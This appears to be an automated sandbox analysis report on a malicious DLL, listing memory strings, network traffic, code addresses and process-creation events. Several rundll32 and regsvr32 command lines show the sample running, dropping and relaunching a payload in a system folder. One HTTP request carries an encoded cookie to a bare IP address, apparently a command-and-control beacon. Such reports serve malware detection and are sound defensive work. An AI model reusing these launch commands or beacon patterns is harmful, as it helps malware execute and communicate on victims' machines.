Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.onlineumfragen.com/3index_2010_agb.cfm
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.queryclick.com/privacy-policy
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.stroeer.de/ssp-datenschutz
Source: iab2Data[2].json.6.dr	String found in binary or memory: https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: svchost.exe, 00000027.00000003.562574198.000001E8CC986000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/
Source: svchost.exe, 00000027.00000003.562687164.000001E8CCE02000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.562492489.000001E8CC9AE000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.562433438.000001E8CC9AE000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.562624515.000001E8CC997000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.562574198.000001E8CC986000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/gesundheit/stueck-seife-bettwasche/?utm_campaign=DECH-bedsoap&utm_
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/kochendes-wasser-auto/?utm_campaign=DECH-cardent&utm_sou
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: global traffic	HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /px.gif?ch=1&e=0.038705726061928736 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd3afd4e88e658af134b18abda7a3ae2a.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b0a39109a3b849d0b2174b409fe1c7f.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2Fb21b558d-9496-4eb0-b10c-21d698be8cbf_1000x600.jpeg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fcNtqWRYEAvIh HTTP/1.1Cookie: wFFCSxt=KroKbMrLxdquGLAVpD8mzOTL6+CJEBylxML8+8LJKbm2NFSJfWyg+Ob4gDvMFIJSB8JkauSCmzenkWfybqLjINgruWQ9hyEz6LBdkvbPAZKalyvPo/EjstrhYIOzCYE0U9F6ESIQNH6mPBh1c7AWHgfaTWG0bJf0yIMhiqP3oKSNSNHW+RMKCwRHRmh4DzBf2Vp20YcxrDb6uOijN0eQ3rjnJQu9vDXRscGluLYAx9sKze0sCBY=Host: 172.104.227.98Connection: Keep-AliveCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.104.227.98:443 -> 192.168.2.5:49881 version: TLS 1.2

System Summary:

Source: Bccw1xUJah.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Frzzoul\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001CFAA	0_2_1001CFAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002800	0_2_10002800
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000BC07	0_2_1000BC07
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001000D	0_2_1001000D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10020C0C	0_2_10020C0C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004A13	0_2_10004A13
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10016015	0_2_10016015
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000FE15	0_2_1000FE15
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000F217	0_2_1000F217
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002617	0_2_10002617
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001BE1F	0_2_1001BE1F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000DC24	0_2_1000DC24
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10010C2F	0_2_10010C2F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021033	0_2_10021033
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007E3E	0_2_10007E3E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10008650	0_2_10008650
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10005651	0_2_10005651
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001EC5A	0_2_1001EC5A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10017679	0_2_10017679
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002C79	0_2_10002C79
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001B278	0_2_1001B278
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C87E	0_2_1000C87E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001C47E	0_2_1001C47E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013682	0_2_10013682
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001A288	0_2_1001A288
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C29B	0_2_1000C29B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001F0A7	0_2_1001F0A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10022EA4	0_2_10022EA4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A4AA	0_2_1000A4AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001D8AD	0_2_1001D8AD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100202B3	0_2_100202B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10019EB5	0_2_10019EB5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10016ACA	0_2_10016ACA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100044D2	0_2_100044D2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10010ED9	0_2_10010ED9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100108D9	0_2_100108D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001B6DB	0_2_1001B6DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000CADE	0_2_1000CADE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001EE2	0_2_10001EE2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001E2E4	0_2_1001E2E4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100060E8	0_2_100060E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000D4EE	0_2_1000D4EE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000D8F0	0_2_1000D8F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A6F7	0_2_1000A6F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100088FC	0_2_100088FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011EFC	0_2_10011EFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10020701	0_2_10020701
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001F90C	0_2_1001F90C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001EB0F	0_2_1001EB0F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001A712	0_2_1001A712
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002317	0_2_10002317
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001FB22	0_2_1001FB22
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10014F2A	0_2_10014F2A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007931	0_2_10007931
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013B36	0_2_10013B36
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001713E	0_2_1001713E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000CD42	0_2_1000CD42
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10007549	0_2_10007549
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001514C	0_2_1001514C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000C551	0_2_1000C551
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001C962	0_2_1001C962
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000BD63	0_2_1000BD63
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000416C	0_2_1000416C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002196C	0_2_1002196C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000E16F	0_2_1000E16F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001B70	0_2_10001B70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10008B74	0_2_10008B74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012378	0_2_10012378
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001177E	0_2_1001177E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10020588	0_2_10020588
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001058C	0_2_1001058C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10021FA6	0_2_10021FA6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100093A7	0_2_100093A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009DA8	0_2_10009DA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000A1AA	0_2_1000A1AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100231BA	0_2_100231BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100065BD	0_2_100065BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100227CB	0_2_100227CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100165CD	0_2_100165CD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10008FCE	0_2_10008FCE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000B9D5	0_2_1000B9D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000ADD9	0_2_1000ADD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100057E6	0_2_100057E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100179EC	0_2_100179EC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10013FF3	0_2_10013FF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000FBF7	0_2_1000FBF7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10017FFB	0_2_10017FFB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000D1FD	0_2_1000D1FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE53ED7	2_2_6EE53ED7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE2EE70	2_2_6EE2EE70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE53FF7	2_2_6EE53FF7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE42F91	2_2_6EE42F91
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3CDCD	2_2_6EE3CDCD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE32D30	2_2_6EE32D30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDD9AD0	2_2_6EDD9AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3CB9B	2_2_6EE3CB9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE32800	2_2_6EE32800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3C969	2_2_6EE3C969
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE32580	2_2_6EE32580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE4F599	2_2_6EE4F599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE42040	2_2_6EE42040
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EE3D02A	2_2_6EE3D02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE53ED7	3_2_6EE53ED7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE2EE70	3_2_6EE2EE70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE53FF7	3_2_6EE53FF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE42F91	3_2_6EE42F91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3CDCD	3_2_6EE3CDCD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE32D30	3_2_6EE32D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EDD9AD0	3_2_6EDD9AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3CB9B	3_2_6EE3CB9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE32800	3_2_6EE32800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3C969	3_2_6EE3C969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE32580	3_2_6EE32580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE4F599	3_2_6EE4F599
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE42040	3_2_6EE42040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6EE3D02A	3_2_6EE3D02A

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6EE3EEBE appears 60 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6EDCFEF0 appears 322 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6EE374F0 appears 38 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EE3EEBE appears 63 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EDCFEF0 appears 322 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EE374F0 appears 36 times

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: Bccw1xUJah.dll

Virustotal: Detection: 10%

Source: Bccw1xUJah.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Bccw1xUJah.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_codec_set_threads@8
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_create_compress@4
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr",MlQLn
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 272
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Frzzoul\kwwohiulewmulvk.tlr",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Bccw1xUJah.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_codec_set_threads@8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_create_compress@4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr",MlQLn	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Frzzoul\kwwohiulewmulvk.tlr",DllRegisterServer
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 272
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

